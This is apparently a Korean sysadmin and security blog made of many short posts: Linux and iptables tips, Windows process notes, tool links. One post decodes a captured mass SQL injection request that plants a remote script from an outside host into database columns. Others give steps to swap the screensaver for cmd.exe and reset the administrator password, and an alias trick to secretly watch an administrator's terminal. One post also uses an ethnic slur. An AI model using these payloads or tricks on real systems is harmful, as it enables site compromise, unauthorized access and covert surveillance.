336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[리눅스] 비프음 없애기

리눅스를 사용하다보면 오타가 날때마다 '삑삑~' 거리는 비프음이 거슬릴 때가 있습니다.

xset -b

or

setterm -blength 0

or

set bell-style none

등의 방법으로 무음으로 변경할 수 있습니다...^^;;


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[자바스크립트] 홈페이지 자동 리프레쉬 하기

가끔 특정 홈페이지 또는 URI를 자동으로 호출해야 할때가 있습니다.
해당 자바스크립트를 이용해 웹브라우저를 리프레쉬 할 수 있습니다.

<html>
<head>
<script language="JavaScript">
setTimeout("history.go(0);" , 10000);
</script>
</head>
<body leftmargin="0" marginwidth="0" topmargin="0" marginheight="0">
<iframe name=iframe1 src=http://www.test.com width=1152 height=864>
</iframe>
</body>
</html>

프레임 및 시간을 조정하여 사용할 수 있습니다.


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[MSI] Mass SQL Injection 분석하기

작년 이만때 쯤 윈도우 IIS를 웹서버로, MSSQL을 DBMS로 사용하는 사이트에 지속적인 공격을 하였던
Mass SQL 인젝션 공격(이하 MSI)을 누구나 한번 쯤은 들어보셨으리라 생각됩니다...

물론 DBA를 전직으로 하고 계시는 한 지인은...그날의 악몽을 잊을 수 없다고 하더군요(2시간 간격으로 DB 원복 ㅋㅋ)

현재는 웹방화벽이라든지 KISA에서 제공하는 WebKnight 또는 MSSQL의 설정을 통해 어느정도 해결점을 찾았습니다.

그러나 IIS+MSSQL 과 같은 플랫폼에서만 아니라 다른 플랫폼에서도 변종 공격이 지속되고 있습니다.

처음에는 단순 declare 구문으로 시작했지만, 단순 인코딩이 되더니 현재는 HEX 인코딩되어 공격을 진행합니다.

암튼 사족은 이만, 각설하고...

변종 MSI 패턴을 확인해보기로 합니다.

- Detected Log
GET /test.asp?id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6762726164702E636F6D2F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.test.com
Connection: Close

- pattern
;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6762726164702E636F6D2F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

- 1차 URL 디코딩 후
;DECLARE @S VARCHAR(4000);SET @S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6762726164702E636F6D2F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220
 AS VARCHAR(4000));EXEC(@S);--

- 2차 Hex 디코딩
;DECLARE @S VARCHAR(4000);SET @S=CAST
(0xDECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.gbradp.com/ngg.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
AS VARCHAR(4000));EXEC(@S);--

결국 http://www.gbradp.com/ngg.js의 코드가 삽입되는 패턴임을 확인할 수 있습니다.

이 밖에도 사이트에서 보면 수많은 MSI 패턴이 아직도 현존하는 경우를 많이 볼 수 있습니다.

confer.
# 1차 디코딩 방법

url.exe


url 인코딩 파일로 분석할 수 있습니다.

# 2차 디코딩 방법

http://home2.paulschou.net/tools/xlate/

perl 스크립트를 이용하여 HEX 디코딩을 할 수 있지만 편하게 웹에서 디코딩 할 수 있는 사이트입니다.



336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[윈도우] 화면보호기를 이용한 윈도우 해킹

꽤 오래전 패스워드(?) 인가란 SF 영화를 보면서 갑자기 엉뚱한 생각이 들었습니다...^_^

보통 고객사이트내지 가정에서도 많이 화면보호기 화면을 접하게 됩니다.

컴퓨터 idle이 어느시간 지속되면 화면보호기가 걸리게되는 점을 악용하여 윈도우 해킹(?)을 시도할 수 있다고 생각됩니다.

시나리오)
PC의 주인이 자리를 비우는 시점에 화면보호기가 작동될 경우,
비록 화면보호기가 작동되면 윈도우가 잠기며 비밀번호를 다시 묻게되죠...
또한 윈도우가 잠긴 상태에서는 비밀번호를 크랙하기 전에는 로그인을 할 수 없죠...

이럴 때 사회공학적 방법을 이용한 해킹이 가능하더군요...

방법)
1. 윈도우 C:\WINDOWS\system32 경로에 logon.scr 파일이 있습니다. 바로 화면보호기 파일이죠...
2. 동일한 디렉토리에 cmd.exe 파일이 있습니다. 바로 cmd 창이죠...
3. copy cmd.exe logon.scr 을 합니다. 물론 덮어쓰기 합니다.
4. 그럼 이제 화면보호기가 걸리는 시점에 화면이 잠기지 않고 덩그라니 cmd 창이 뜨게 됩니다.
- 비밀번호 변경 작업
5. net user administrator *
6. 원하는 비밀번호로 변경합니다.

# 좀 허접한 팁이지만 *.scr 파일과 같은 윈도우 파일을 악용하여 원하는 정보를 획득할 수 있는 방법은
많다고 생각됩니다...


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

ariskkey_75b1780(패스워드 보기).exe

SetupRevelationV2.exe


[보안툴] 저장된 비밀번호를 확인하기 위한 툴

PC에 저장된 비밀번호를 확인하기 위한 툴은 이밖에도 웹상에서 많이 다운받을 수 있습니다.
그러나 첨부파일 중 revelation 이 가장 사용하기 쉽다고 생각되네요...^-^

# 사용용도 ; 
 0x01 ; 웹상에서 마스크된 비밀번호를 확인할 때
 0x02 ; 아웃룩 등의 저장된 비밀번호를 까먹었을 때
 0x03 ; 기타 마스크처리된 비밀번호를 확인할 때 등등...

# 사용방법 ;
십자가 표시를 마스크처리된 부분에 드래그 앤 드롭하면 비밀번호를 확인할 수 있습니다.


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

mstsc-5307-basic2k.zip


[윈도우2000서버] 원격데스크탑 실행 파일입니다.

윈도우2K서버에서는 원격데스크탑을 실행할 수 있는 파일이 기본 설치가 안되어있고,
어드민 툴에서 따로 설치해야되는 것으로 알고 있습니다.

원격데스크탑 실행방법) 윈도우키 - 시작 - 실행 - mstsc


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

Autoruns!.zip


[윈도우] 프로세스 확인하는 툴

sysinternals 에서 다운 가능한 윈도우 프로세스를 확인하는 툴입니다.

기존에 사용하던 procexpnt 보다 기능이 더 좋다고 생각됩니다.

악성코드 및 네트워크 웜 등의 특정 프로세스가 실행될 경우 확인할 수 있습니다.

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[리눅스] 누가 언제 어떤 작업을 했는지 히스토리에 남기는 방법


예전에, "난 네가 지난 여름에 ...무엇을 했는지 알고 있다..." 잘은 기억나지 않지만 이런 영화가 있었죠...? ^-^

리눅스에서도 history 명령어를 통해 지난 작업 명령을 확인할 수 있습니다.

방법)
/etc/profile 에

# timestamp add
HISTTIMEFORMAT="%Y-%m-%d_%H:%M:%S\ "
export HISTTIMEFORMAT

를 추가한 후에 재 로그인을 해보면,

history 명령어 사용 시 시간을 확인할 수 있습니다.


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[서버] 시스템 정보 확인하기

간혹 서버를 점검하다 보면 서버의 스펙을 확인해야 할 때가 있습니다.

예를 들자면, 서버의 바이오스 정보, NIC 카드의 정보 등등이 그것이죠...

물론 케이스를 오픈하고 육안으로 확인하는 방법 또는 서버를 재부팅할 때 POST를 확인하는 방법 등등이 있습니다.

그러나 케이스를 오픈하지 않고 간단히 확인하는 방법 또한 있습니다.

윈도우 서버의 경우, everest (AIDA32의 업그레이드 버전)을 다운받아 육안으로 쉽게 확인할 수 있습니다.



리눅스 서버의 경우,

바이오스 정보를 확인할 때는
# dmidecode | less 의 명령어로,


NIC 정보를 확인할 때는
# ethtool -i eth0 의 명령어로 확인이 가능합니다.




336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[네트워크] 리눅스에서 네트워크 대역폭 측정하기

네트워크 관점에서 보면 트래픽을 유발할 수 있는 NFS와 같은 파일서버의 대역폭이 궁금할 때가 있습니다.

보통 윈도우서버의 경우 티밍, 리눅스서버의 경우 본딩이라는 기술을 이용해 2개 이상의 랜카드를 묶어서
하나의 채널로 사용하기에 더 넓은 대역폭을 사용하는 경우도 있습니다.

"그럼 실제 랜카드의 대역폭은 어떻게 될까요?"

만약 기가비트 랜카드의 경우 이론상,
1Gbit는 1024Mbit 이므로, 1024Mbit/8=128MBytes 즉, 128MB가 되게 됩니다.

리눅스의 경우 툴을 이용하여 대역폭을 측정할 수 있습니다.
레드햇계열의 경우)

yum -y install iperf 를 하여 측정하고자 하는 서버에 설치를 합니다.

한번 VMWARE에 있는 2개의 가상 OS를 바탕으로 테스트를 해봤습니다.

1. LINUX A 서버 192.168.31.130
트래픽을 받는 서버의 경우 iperf -s -f M


2. LINUX B 서버 192.168.31.133
트래픽을 보내는 서버의 경우 iperf -c 192.168.31.133 -P 4 -f M -w 256k -t 60


# 결과 ; 상기와 같이 VMWARE에 있는 가상 리눅스서버를 대상으로 했을 때 거의 이론상 근접한 100MB의 대역폭을 사용할 수 있음을 알 수 있습니다. (VMWARE 6.0 버전의 경우 OS 상의 랜카드가 기가비트로 잡힌다는 것도 알 수 있습니다.)

만약, 본딩 및 티밍을 구성하였을 경우 현재 랜카드 대역폭의 2배 정도를 소화할 수 있다고 생각됩니다...^-^




336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[리눅스] 원격지에서 작업하는 내용 엿보기

레드햇 계열 리눅스에서는 screen이란 명령어를 통해 원격지에서 접속하는 사용자의 행위를 모니터링 할 수 있습니다.
또한 screen 명령을 통해 상호간의 내용 전달도 가능합니다.

방법)
screen 패키지가 없다면 yum install -y screen 을 통해 다운받습니다.

로컬시스템에서 screen -S test 라고 하여 터미널 세션을 열어 놓고 기다립니다.
그 다음 원격지에서 screen -x test 라고 하여 터미널 세션에 붙습니다.

그 이후 로컬시스템 및 원격지에서의 행위가 서로에게 모니터링 됩니다.

팁)
만약 서버관리자가 어떤 작업을 하는지 모니터링 하고 싶을 때,
살짝 alias를 건듭니다. ^-^
예) alias ls = 'ls ; screen -x test'
그럼 서버관리자가 ls를 치는 순간부터 모니터링이 가능합니다.


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

swftools-0.8.1.zip


[툴] SWFDUMP - 플래시파일 덤프하기

악성코드가 내포된 플래시 파일을 분석할 때 필요한 유틸리티

사용법 ; 압축 해제 후 .exe 설치
C:\swftools>swfdump.exe -D 해당플래시파일


출처 : http://www.swftools.org/


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
About iptables...

# Kernel 2.4.x 버전에서 기본 탑재됨, /sbin에 설치됨, RPM으로 설치 가능

# 3개의 Chain이 있음
  - INPUT
  - OUTPUT
  - FORWARD

# 3개의 행위
  - ACCEPT ; 허용
  - DROP ; 패킷을 무시함
  - DENY ; '차단' 이라는 메시지를 보내고 차단함

예)
./iptables -A INPUT -s 200.200.200.200 -j DROP
./iptables -A INPUT -s 200.200.200.0/24 -p tcp --destination-port telnet -j DROP
./iptables -A INPUT -p tcp --destination-port telnet -i eth0 -j DROP

# 룰 변경 방법
./iptables -l ; 룰 추가
./iptables -R ; 룰 replace
./iptables -L ; 룰 리스트 확인
./iptables -F ; 룰 임시 삭제

예)
인터넷 차단 예
./iptables -A INPUT -i eth0 -p tcp --syn -j DROP

예)
80 포트를 제외한 모든 포트 차단
./iptables -A INPUT -i eth0 -p tcp --syn --destination-port !80 -j DROP

# ICMP 차단 옵션
--icmp-type 0 ; Echo Request
--icmp-type 3 ; Destination Unreachable
--icmp-type 11 ; Time exceeded

# 스크립트로 등록하는 방법
/etc/rc.d/rc.local 에
if [ -f /etc/sysconfig/iptables ] ; then
/etc/sysconfig/iptables
fi


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.


ASCII 코드표입니다.


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

url_인코딩.zip


인코딩된 URL 해석하는 툴

# 사용방법 ; 마우스 우클릭 - 연결프로그램 - 인터넷익스플로러
로 파일 여신 후 사용하면 됩니다.


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

직장 후배 키우기 10계명

1. 억지로 가르치려고 하지 마라.

2. 하루에 15분씩을 후배 교육에 할애하라.

3. 자주 일을 맡겨라.

4. 단점을 찾지 말고 장점을 찾아라.

5. 후배의 유형을 장인형, 플래너형, 프로듀서형으로 구분하라.

6. 일을 하는 방식에 따라 특성을 파악하라.

7. 능력을 성급히 판단하지 마라.

8. 불평을 아이디어의 배출구로 만들어라.

9. 잘못하면 꾸짖어라.

10. 매력 있는 선배가 돼라.

유비무환!
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

내 PC안의 악성코드 제거하기.pdf


[팁] 내 PC안의 악성코드 제거하기

간략 정리
1. 시작 - 실행 - mrt 를 사용하여 MS에서 제공하는 악성소프트웨어 제거 도구를 사용한다.

2. 익스플로러 - 도구 - 인터넷 옵션 창의 보안 / 사용자지정수준 을 클릭하여,
서명 안 된 ActiveX 컨트롤 다운로드->사용안함, 서명된 ActiveX 컨트롤 다운로드->확인 으로 변경한다.

3. 익스플로러 - 도구 - 인터넷 옵션 창의 설정 / 개체보기 를 클릭하여,
나오는 내용 중 설치된 프로그램에 마우스 오른쪽 클릭을 통해 회사 및 버전을 확인합니다.
만약 이상한(?) 내용이 나오게 되면 가차없이 삭제하면 됩니다.
또한 설치된 프로그램 중 손상됨, 정보없음 으로 표기된 프로그램도 삭제하면 좋습니다.

4. MS 취약점 분석도구인 MBSA를 이용하여 PC 보안상태를 체크합니다.
링크 ; http://technet.microsoft.com/ko-kr/security/cc184923.aspx


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

내 IP를 확인하는 방법.pdf


[내 PC의 공인 IP를 확인하는 방법]

회사 또는 가정에서 PC를 사용할 경우 자신의 IP를 사설로 사용하는 경우가 많습니다.
사설 IP의 경우 보통 192.168.x.x와 같은 IP를 사용하는데요...
그럼, 외부에서 보이는 IP는 어떻게 될까요?

여기서 말하는 IP는 웹서버의 접속 로그에 남는 IP이기도 하죠 ^^;

[사용용도]
1. 방화벽 정책을 오픈할 경우 상대방의 IP를 확인할 때 필요함
2. 실제 본인의 IP가 웹접속 및 인터넷 망에서 어떻게 표현되는지 확인할 때 필요함 등등...



336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.


Shift+Space로 한영 전환하기

리눅스 유저들에게 익숙해진 shift+space 한영 변환...

윈도우에서도 레지스트리 변경으로 가능합니다.

Shift Space 한글 전환.reg


-------------------------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters]
"PollingIterations"=dword:00002ee0
"PollingIterationsMaximum"=dword:00002ee0
"ResendIterations"=dword:00000003
"LayerDriver JPN"="kbd101.dll"
"LayerDriver KOR"="kbd101c.dll"
"OverrideKeyboardType"=dword:00000008
"OverrideKeyboardSubtype"=dword:00000005
"OverrideKeyboardIdentifier"="kbd101c.dll"
"KeyboardFailedReset"=dword:00000000

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
BHO나 악성프로세스를 확인할 수 있는 툴입니다.

autoruns.zip

sysinternals의 툴은 정말 맘에 듭니다 ^^;


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

윈도우 필수 프로세스 정보 입니다.

csrss.exe
Client/Server Run-time SubSystem
콘솔창, 스레드의 생성 및 삭제, 16비트 가상 MS-DOS 환경을 관리한다.

lsass.exe
Local Security Authentication Server
사용자의 로그온 값의 타당성을 검증하며 winlogon 서비스를 위해 사용자 인증을 담당할 프로세스를 생성합니다.
msgina.dll과 같은 인증 패키지를 사용해서 인증을 수행하며, 인증이 성공적이면 사용 접근토큰을 발생하며,
사용자 접근 토큰은 초기 쉘을 실행하는데 사용됩니다. 사용자가 시작하는 다른 프로세스는 이 토큰을 상속합니다.

services.exe
서비스 관리자
이 프로세스는 시스템 서비스의 시작, 중지 및 시스템 서비스와의 상호 작용을 담당하는 서비스 제어 관리자
입니다.

smss.exe
Session Manager SubSystem
사용자 세션의 시작을 담당하는 세션 관리자 하위 시스템으로, 이 프로세스는 시스템 스레드로부터 시작되며
winlogon 및 win32(csrss.exe) 프로세스의 시작과 시스템 변수 설정을 비롯한 다양한 작업을 수행합니다.
smss.exe는 이러한 프로세스를 시작한 후 winlogon이나 csrss가 종료되기를 기다리며, winlogon이나 csrss가
정상적으로 종료되면 시스템을 종료하며, 예기치 않은 일이 발생할 경우 smss.exe는 시스템의 응답을 중지합니다.(hang up 현상)

system
대부분의 시스템 커널 모드 스레드가 system 프로세스로 실행됩니다.

system idle process
각 프로세서에서 실행되는 단일 스레드로 시스템이 다른 스레드를 처리하지 않을 때의 프로세서 시간을
나타내는 일을 합니다. 일반적으로 작업 관리자에서 이 프로세스가 프로세서 시간의 대부분을 차지합니다.

svchost.exe
dll로 실행되는 다른 프로세스의 호스트 역할을 하는 프로세스로서 이 프로세스 항목은 하나 이상 표시될 수
있으며, 보통 4~6개가 실행됩니다.

winlogon.exe
Windows Logon
사용자 로그온과 로그오프를 관리하며, Windows XP Activation Code를 검사합니다.


헉헉 -_- ++

요즘 짱개들이 퍼트리는 악성코드는 csrs.exe scvhost.exe(일명 SCV 악성코드)처럼 실제 프로세스와 비슷한

이름을 사용합니다. 독한 놈의 경우는 csrss.exe 처럼 동일한 이름을 사용하는 경우도 있습니다.

-> 이럴땐, system32 폴더에서 가동된 것인지 확인한 후 만약 아니면 kill 하면 됩니다...^^;;;


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

웹 로딩 속도를 측정할 수 있는 툴입니다.

check_load_time_v2.1.exe

해당 URL을 넣으신다음에 Check Load를 하시면 로딩시간이 계산됩니다. 

해당 네트웤 속도 변수에 따라 그때그때 다르니... 

사용 및 원리는 알아서...^^;;;


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

Win2K 원격데스크탑 실행파일입니다.

mstsc-5307-basic2k.zip

윈도우 2000 서버의 경우 원격데스크탑이 기본으로 설치되지 않습니다.(따로 추가 설치 해야함) 

급히 원격데스크탑을 붙을 때 요긴한 파일입니다. 

물론 MS 홈페이지의 resources 페이지에 링크된 자료이기도 합니다. 

시작 - 실행 - mstsc ㄱㄱ


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

URL 스캐너입니다.

intellitamper_v2.07(웹경로확인).exe

지나친 스캔은 법적으로 문제시 될 수 있습니다... 

사용은 알아서...^^;;;


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

파일 및 데이타의 변조유무 파악에 필요한 해싱툴입니다.

hash_calculator_install[1].1.0.0.3.exe

md5 hashing 툴입니다.

설치하신 후 마우스 우클릭을 통해 .md5 파일을 만들수도 있으며, hashing 값을 통해

파일 및 데이타의 변조유무도 확인할 수 있습니다.

hash_calculator_install[1].1.0.0.3.exe

MD5:
1EDE73898D1839609B0BA409DE5001AE

앞으론 MD5 해싱값만 올려놓도록 하겠습니다.

cf. malware~야! silkwrap~야! 물러나라!!!


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

모의해킹 사이트 입니다.

해킹 연습에 도움을 줄 가상 은행 사이트이네염 

http://demo.testfire.net


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

NT 서버관리자에게 필요한 MBSA 취약점 분석 툴

Microsoft Baseline Security Analyzer 입니다. 

서버 보안 점검하러 들어갈 때 MS공식 취약점 분석툴인 MBSA 가지고

해당 서버를 스캔해주면 담당자 분들이 좋아하겠죠? ㅎㅎ

(점검일지에 기입할 명목도 생기구염 ㅋ) 

윈도우 보안 취약점을 스캔할 때 유용한 툴입니다. 

출처 ;

http://www.microsoft.com/technet/security/tools/mbsa1/default.mspx 

http://www.microsoft.com/downloads/details.aspx?FamilyID=F32921AF-9DBE-4DCE-889E-ECF997EB18E9&displaylang=en#filelist 

음...함돌려봐야겠군하~


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

업무에 도움이 되는 툴 시리즈 #1

www.xobni.com
사이트에서 아웃룩관련 이메일관리 애드온을 받으세염~ 

깔면 보낸사람의 연락처(메일, 휴대폰 등)를 자동으로 불러오며, 보낸사람의 Rank를 확인할 수도 있는

잼나는 애돈입니다. ㅎㅎ


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

위기=위협+기회

마이크로소프트, 구글, HP... 

이들의 공통점은? 

-> 불황이나 경제위기에 창업된 기업임 


그럼... 

네이버, 엔씨소프트는? 

바로 우리나라가 IMF의 데미지를 입은 97년에 시작한 기업이라는...


이 글을 보시는 모든 분들 모두 파이팅 입니다!!!


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

리눅스보안 관련 Old 문서

2006실습교육교재_리눅스보안.pdf


사무실에서 굴러다니는 올드한 리눅스보안관련 문서...

심심할때 한번 읽어보시길..


+ Recent posts